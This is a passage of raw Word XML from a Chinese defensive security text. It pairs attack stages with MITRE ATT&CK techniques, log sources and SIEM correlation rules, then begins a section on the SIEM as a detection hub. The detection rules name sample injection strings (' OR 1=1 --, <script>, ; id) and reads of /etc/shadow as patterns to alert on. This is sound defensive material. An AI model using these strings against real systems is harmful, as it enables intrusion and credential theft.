              </w:rPr>
              <w:t xml:space="preserve">关键日志源</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ②</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SIEM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">关联/检测思路</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">侦察与扫描（卷2，Ch5）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">端口扫描、服务探测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">T1046：Network</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Service Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">网络流日志（NetFlow/sFlow）、防火墙日志、主机防火墙日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">来自同一源</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">在短时间窗口内对多目标</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">IP/多端口的连接尝试，且</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SYN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">连接比例异常高。可关联后续漏洞利用企图升级告警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">链路层攻击（卷2，Ch6）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">欺骗、中间人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">T1557：Adversary-in-the-Middle（ARP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">缓存投毒）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">交换机</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> CAM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">表日志、主机</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">表变化事件（如通过</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> osquery Sysmon </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">事件）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">检测到同一</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">对应多个</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MAC </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">或网关</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MAC </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">地址短时间内发生变化。关联后续异常</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DNS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">或</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> HTTPS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">降级事件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">注入（卷3，Ch9-11）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">SQLi、XSS、命令注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">T1190：Exploit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Public-Facing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Application；T1059.007：JavaScript（用于</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> XSS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">执行）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务器访问日志、WAF</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">日志、应用日志（错误/异常）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">日志中出现</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SQL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">关键字片段（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">' OR 1=1 --</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">）、XSS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">向量（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">标签）或系统命令字符（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">; id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">）时触发告警。关联随后从</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务器发起的异常出站连接（Web</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Shell </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">反向连接）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">客户端执行与载荷投递（卷4，Ch17）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Metasploit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">生成</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">T1204：User</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Execution；T1059：Command</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">端点进程创建日志（Sysmon</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> EventID </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">1）、命令行参数审计日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">检测</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Office </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">文档启动</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> PowerShell </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">或</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> cmd.exe </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">并传递</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Base64 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">编码参数。关联后续从该主机发起的扫描或横向移动。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">权限提升（卷4，Ch15）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Linux/Windows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">本地提权（内核漏洞利用、SUID</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">滥用、UAC</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> bypass </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">等）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">T1068：Exploitation</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> for Privilege </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalation；T1548：Abuse</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Elevation Control Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">端点系统日志（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/var/log/auth.log</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">或</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Windows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">安全事件</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">4648/4672）、Sysmon</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">进程树</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">普通用户进程突然创建具有高权限子进程（如从</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> www-data </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">到</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> root </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">shell）。关联此前非特权进程对敏感文件的读取尝试（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/shadow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">横向移动（卷4，Ch17）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">psexec、WinRM、SSH </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">横向</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">T1021.001：Remote</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Desktop </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocol；T1021.004：SSH；T1021.002：SMB/Admin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">主机认证日志、SMB</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">连接日志、Sysmon</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> EventID </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">3（网络连接）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">使用服务账户或域管理员账户从非管理用工作站发起远程连接。关联此前该主机未出现定期管理任务。可结合异常时间或流量不均衡检测。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">持久化（卷4，Ch18）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">计划任务、注册表</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> RunKey、Web Shell </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">放置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">T1053：Scheduled</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Task/Job；T1547.001：Registry</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Run </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Keys；T1505.003：Web</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">主机计划任务创建日志（Win</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">4698）、注册表写入审计、Web</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务器文件创建事件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">系统在异常时间或由异常进程创建计划任务；Web</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">目录下出现新</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> PHP/JSP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">文件，且文件创建者为</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务用户。关联该文件随后被访问的日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上表仅为示例，实际环境中需根据操作系统、应用栈及现有日志完备度进一步细化。表中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">均为标准分类</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①，具体日志源与检测逻辑部分依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows、Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本和日志配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②，而最终的关联规则需在具体</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">平台中实现③。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御体系的总成：SIEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">作为检测中枢</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将上述检测对偶表落地，离不开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为数据汇聚与关联中心。但必须指出，SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本身不是一个“开箱即用”的完整检测系统，其效能取决于三个前提：（1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">充足的日志覆盖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——如果攻击者利用的技术在日志中没有留痕（如部分内存攻击或硬件攻击），SIEM</w:t>
